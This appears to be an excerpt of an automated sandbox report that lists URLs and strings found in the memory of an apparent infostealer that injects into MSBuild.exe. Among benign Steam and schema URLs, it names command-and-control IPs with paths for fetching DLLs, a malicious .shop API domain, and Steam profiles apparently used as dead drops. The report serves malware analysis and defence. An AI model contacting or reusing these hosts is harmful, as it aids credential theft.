Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcodezhttp://schemas.xmlsoap.org/ws/2005/
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/privatepersonalidentifierzhttp://schemas.xmlso
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddress
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishedname
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/identity
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041E3000.00000004.00000800.00020000.00000000.sdmp, DGDBKFBAKF.exe, 00000007.00000002.2157026273.00000000048C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.2459852233.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: MSBuild.exe, 00000001.00000002.2419848268.000000001FD6D000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2405952404.0000000019DC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/1
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/5
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/F
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/a
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/freebl3.dll
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/indows.storage.dlll
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/mozglue.dll
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/mozglue.dll#
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/msvcp140.dll
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/nss3.dll
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/p
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/sktop
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/softokn3.dll
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/sqls.dll
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/sqls.dllkA
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/vcruntime140.dll
Source: MSBuild.exe, 00000006.00000002.2623692581.0000000001077000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617277364.000000000048F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.108
Source: MSBuild.exe, 00000006.00000002.2623692581.0000000001173000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2623692581.00000000010A7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2623692581.0000000001100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.108/
Source: MSBuild.exe, 00000006.00000002.2623692581.0000000001100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.108/&
Source: MSBuild.exe, 00000006.00000002.2623692581.00000000010A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.108/0?Q
Source: MSBuild.exe, 00000006.00000002.2623692581.0000000001100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.108/1
Source: MSBuild.exe, 00000006.00000002.2623692581.0000000001173000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.108/SF
Source: MSBuild.exe, 00000006.00000002.2623692581.0000000001173000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.108/_F
Source: MSBuild.exe, 00000006.00000002.2623692581.0000000001100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.108/e
Source: MSBuild.exe, 00000006.00000002.2623692581.00000000010A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.108/en-GB
Source: MSBuild.exe, 00000006.00000002.2623692581.0000000001077000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.108/sqls.dll
Source: MSBuild.exe, 00000006.00000002.2623692581.0000000001077000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.108/sqls.dll=Sq
Source: MSBuild.exe, 00000006.00000002.2617277364.000000000048F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.1085938.132
Source: MSBuild.exe, 00000006.00000002.2617277364.000000000044B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.1087a81d3649le
Source: MSBuild.exe, 00000006.00000002.2617277364.0000000000566000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.1087a81d3649xe
Source: MSBuild.exe, 00000006.00000002.2617277364.0000000000566000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617277364.00000000004CD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.108BGI
Source: MSBuild.exe, 00000006.00000002.2617277364.00000000004AE000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.108DAF
Source: MSBuild.exe, 00000006.00000002.2617277364.00000000004CD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.108.151.108Local
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, HJDBFB.1.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, HJDBFB.1.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&a
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=e0OV
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, HJDBFB.1.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, HJDBFB.1.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: HJDBFB.1.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: MSBuild.exe, 00000008.00000002.2274890181.0000000000D20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/
Source: MSBuild.exe, 00000008.00000002.2274973288.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2273918492.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2273918492.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/api
Source: MSBuild.exe, 00000008.00000002.2274890181.0000000000D20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/dp
Source: MSBuild.exe, 00000008.00000002.2273918492.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/ff
Source: MSBuild.exe, 00000001.00000002.2420463242.00000000201A9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2431822834.0000000031FFB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2438009388.000000003DEDF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2424034022.0000000026112000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: https://mozilla.org0/
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000E48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000E48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com//
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.000000000418F000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.0000000004161000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.0000000004B1E000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2075717329.000000000326D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000006.00000002.2617277364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199743486170
Source: DBAAFIDGDA.exe, 00000005.00000002.2078508760.000000000418F000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.0000000004161000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2078508760.0000000004B1E000.00000004.00000800.00020000.00000000.sdmp, DBAAFIDGDA.exe, 00000005.00000002.2075717329.000000000326D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2617277364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199743486170hellosqls.dllsqlite3.dllThe
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004380000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004353000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004866000.00000004.00000800.00020000.00000000.sdmp, 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.00000000049A3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000E87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
Source: MSBuild.exe, 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2384093169.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
